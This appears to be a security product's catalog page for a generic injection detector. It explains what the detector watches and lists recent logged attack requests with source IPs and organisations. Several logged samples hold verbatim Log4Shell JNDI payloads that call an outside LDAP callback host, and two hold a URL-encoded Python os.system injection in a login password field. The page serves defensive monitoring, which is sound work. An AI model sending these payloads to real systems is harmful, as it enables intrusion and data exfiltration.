cloud1
cloud2
cloud3
cloud4
cloud5
cloud6
← Back to annotator catalog
General injection attempts signal illustration
Annotator injg

General injection attempts

Suspicious input patterns consistent with injection-like probing across multiple families.

Attack family · Generic injection and parser abuse Phase · Reconnaissance and exploit staging Risk · Medium to high
How It Works Recent Real Samples

What This Annotator Watches

This explanation is derived from the live annotator implementation, not hand-waved catalog copy.
Focus
  • Generic crafted-input probing across multiple injection families
  • XXE, JNDI, LDAP, NoSQL, SSTI, OGNL, and expression-style payloads
  • Input that does not fit neatly into one narrower exploit family
Logic
  • The annotator recognizes broad-spectrum injection payload structures.
  • Specific families like JNDI or OGNL raise stronger findings than generic operator noise.
  • It is intentionally broad and is best interpreted alongside more specific annotators when they co-occur.
Attack Family
Generic injection and parser abuse
Phase · Reconnaissance and exploit staging Risk · Medium to high
This family catches crafted input that is clearly trying to influence how something parses, evaluates, resolves, or expands, even when the payload does not sit neatly inside one named exploit family.
Damage Patterns
  • Generic injection often precedes the more specific exploit signal because the attacker is first discovering what parser or interpreter is in play.
  • It can still do real damage by reaching overlooked template engines, deserializers, expression evaluators, or external resolvers.
Incident Lore
  • Some of the ugliest incident stories started with defenders dismissing weird metacharacters as noise because they did not look like textbook SQLi.
  • This is often the lore of near misses, odd parser behavior, and the exploit family that only becomes obvious after the fact.
How To Read It
Use this as the wide-angle injection signal when the request was clearly crafted but not purely SQLi, header injection, or command injection.
Defender Takeaway
Treat this as crafted-input pressure. The attacker is feeling for any interpreter that will answer back.
Catalog Definition
A broad-spectrum injection signal for suspicious input patterns that do not cleanly map to a specific exploit family. This can include odd metacharacters, encoding tricks, and payload fragments that suggest an attempt to influence parsing or evaluation. Treat this as “generic crafted input” and interpret alongside more specific annotators (SQLi, header injection, command injection) when they co-occur.

10 Most Recent Real Samples

Weekly cached from live annotated access events so the catalog stays fast.
Week
2026W16
Lookback
30 days
Total matched
12
Latest sample
Mar 29, 2026 • 22:00
Top rules
injg:jndi_log4shell · 8 injg:code_exec_tokens · 2
Top requester orgs
FranTech Solutions · 8 Private Customer · 2
Severity mix
36 · 8 24 · 2
Method mix
GET · 10
GET 200 36
Mar 29, 2026 • 22:00
/
JNDI injection string (Log4Shell-style) observed
IP 151.243.11.23 Subnet 151.243.11.0/24 Org Private Customer Country Germany Rule injg:jndi_log4shell
GET 301 36
Mar 29, 2026 • 22:00
/
JNDI injection string (Log4Shell-style) observed
IP 151.243.11.23 Subnet 151.243.11.0/24 Org Private Customer Country Germany Rule injg:jndi_log4shell
GET 301 36
Mar 22, 2026 • 12:47
/
JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:jndi_log4shell
GET 301 36
Mar 22, 2026 • 12:47
/?x=${jndi:ldap://${:-210}${:-737}.${hostName}.uri.d6sh4csqftks16s5e3sg9fxiphagn3yob.oast.fun/a}
JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:jndi_log4shell
GET 301 36
Mar 22, 2026 • 10:42
/?x=${jndi:ldap://127.0.0.1
JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:jndi_log4shell
GET 200 36
Mar 22, 2026 • 09:44
/
JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:jndi_log4shell
GET 200 36
Mar 22, 2026 • 09:43
/?x=${jndi:ldap://${:-210}${:-737}.${hostName}.uri.d6sh4csqftks16s5e3sgyku1zm8pt44ck.oast.fun/a}
JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:jndi_log4shell
GET 200 36
Mar 22, 2026 • 09:01
/?x=${jndi:ldap://127.0.0.1
JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:jndi_log4shell
GET 301 24
Mar 19, 2026 • 22:32
/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d30497a…
Code execution token(s) in request text
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:code_exec_tokens
GET 404 24
Mar 19, 2026 • 19:12
/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d30497a…
Code execution token(s) in request text
IP 107.189.16.114 Subnet 107.189.16.0/24 Org FranTech Solutions Country Netherlands Rule injg:code_exec_tokens